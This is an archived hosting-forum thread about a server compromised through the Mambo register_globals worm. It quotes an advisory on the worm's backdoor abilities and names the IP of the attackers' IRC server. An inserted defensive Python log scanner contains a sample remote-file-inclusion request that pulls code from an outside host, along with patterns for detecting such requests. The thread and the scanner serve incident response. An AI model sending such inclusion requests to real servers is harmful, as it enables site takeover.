Full Version: Was I hacked?
The Planet Forums > Security > General Security > UNIX Security
bamaster
It appears a Perl script was uploaded to my server and is causing excessive outbound traffic. I'm not running any Perl scripts that I know of, however it was probably uploaded via a PHP script.

Does this sound like a hack? Any ideas of where I can look for the vulnerability?

Thanks in advance!
eddy2099
There is a possibility. You could disable the Perl script and do a CHKROOTKIT http://www.chkrootkit.org/ and then at the same time go to Orbit and request a free vulnerability scan of your system https://orbit.theplanet.com/nav_services/vs...an_request.html

Even if you were not attacked, it is always a good idea to run those at least once a month as part of your maintenance regime.
knalb
I would also recommend IMMEDIATELY reviewing your Apache logs to find out for sure if a PHP script was exploited. I've seen this happen quite a few times (and even on one of my boxes when I failed to keep something up to date).

Better safe than sorry.
bamaster
Good call, guys! I'll do a CHKROOTKIT and request a vulnerability scan. I've dl'ed my logs so now I'll have to make some sense of it.

Thanks!
bamaster
Turns out it was a Mambo exploit. Here is a post from Outpost24.com...

QUOTE
Mambo worm in the wild
2005-12-05 8:08 PM, GMT
Mambo is a dynamic portal engine and content management system. The software is written in PHP. A computer researcher who goes under the alias rgod released an exploit for the "register_globals" Emulation Layer Overwrite vulnerability, and just a few days after the vulnerability was released, increased attacks on this vulnerability were monitored; the increased traffic is due to a worm which is currently in the wild.


Linux/Elxbot is a backdoor for the Mambo vulnerability. It will search on Google for vulnerable targets. Once it infects a computer it will connect to a predetermined IRC server where the attackers will wait and have the possibility to gain access to the infected computer. The attackers may also perform various tasks such as:

* Execute arbitrary commands
* TCP flood
* HTTP flood
* UDP flood
* Search Google for more vulnerable targets
* Portscan

On certain systems it will also download a Perl script which will allow the attacker to create a backchannel and spawn a shell on the infected computer with the same privileges as the running web server.


There is a security patch available from Mambo:
http://www.mamboserver.com/index.php?optio...id=172&Itemid=1

Hope this helps someone else.
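As an added example (not from the thread or any poster), here is a script that does the log review knalb recommends, keyed to the vulnerability class in the Outpost24 post above: it parses Apache access-log lines and flags requests that override PHP globals through `GLOBALS[...]` query parameters or pass a remote URL as a parameter value, the pattern of a register_globals overwrite leading to remote file inclusion. The log lines, hosts and the global name `config_path` are constructed; the thread does not name the variable the worm overwrites, and the check does not depend on it.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache common/combined log prefix; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log (not from the thread). Lines 2 and 3 are the same
# request in plain and percent-encoded form: a GLOBALS[...] parameter whose
# value is a remote URL, i.e. an attempt to make the PHP application include
# attacker-hosted code. 'config_path' is a placeholder name.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Dec/2005:20:10:01 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Dec/2005:20:11:44 +0000] "GET /index.php?GLOBALS[config_path]=http://203.0.113.9/c.txt? HTTP/1.1" 200 310 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Dec/2005:20:11:45 +0000] "GET /mambo/index.php?GLOBALS%5Bconfig_path%5D=http%3A%2F%2F203.0.113.9%2Fc.txt%3F HTTP/1.1" 200 310 "-" "Mozilla/5.0"
10.0.0.8 - - [05/Dec/2005:20:12:02 +0000] "GET /images/logo.png HTTP/1.1" 304 0 "-" "Mozilla/5.0"
"""

def suspicious_params(target):
    """Return the reasons a request target looks like a register_globals
    override or remote file inclusion attempt; an empty list means benign."""
    query = urlsplit(target).query
    reasons = []
    # parse_qsl percent-decodes names and values, so the encoded and plain
    # forms of the same request are judged identically.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.startswith('GLOBALS'):
            reasons.append(f'overrides PHP global via {name}')
        if REMOTE_URL.match(value):
            reasons.append(f'remote URL passed in parameter {name}')
    return reasons

def scan_log(text):
    """Return (host, time, target, reasons) for every flagged log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line; skip rather than guess
        reasons = suspicious_params(m['target'])
        if reasons:
            hits.append((m['host'], m['time'], m['target'], reasons))
    return hits

if __name__ == '__main__':
    for host, when, target, reasons in scan_log(SAMPLE_LOG):
        print(host, when, target, '; '.join(reasons))
```

Run it over a real access log by replacing SAMPLE_LOG with the file contents; the source host of any hit is where to look next, and the timestamp bounds the window to compare against file modification times in the web root.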
athenahosting
QUOTE
Turns out it was a Mambo exploit. Here is a post from Outpost24.com...

Hope this helps someone else.

Yeah, if it hadn't been for this very post I'd have been continually screwed.

The punks are currently using an exploited server at IP 208.53.182.54 to run an IRC server, which is where the worm sends all its data to at the moment. I'm sure they'll find a new home in the coming days as I've definitely notified the admins at fdcservers about their activities.

Thanks for that post, man...
bartek
QUOTE
Hope this helps someone else.


It did. Thank you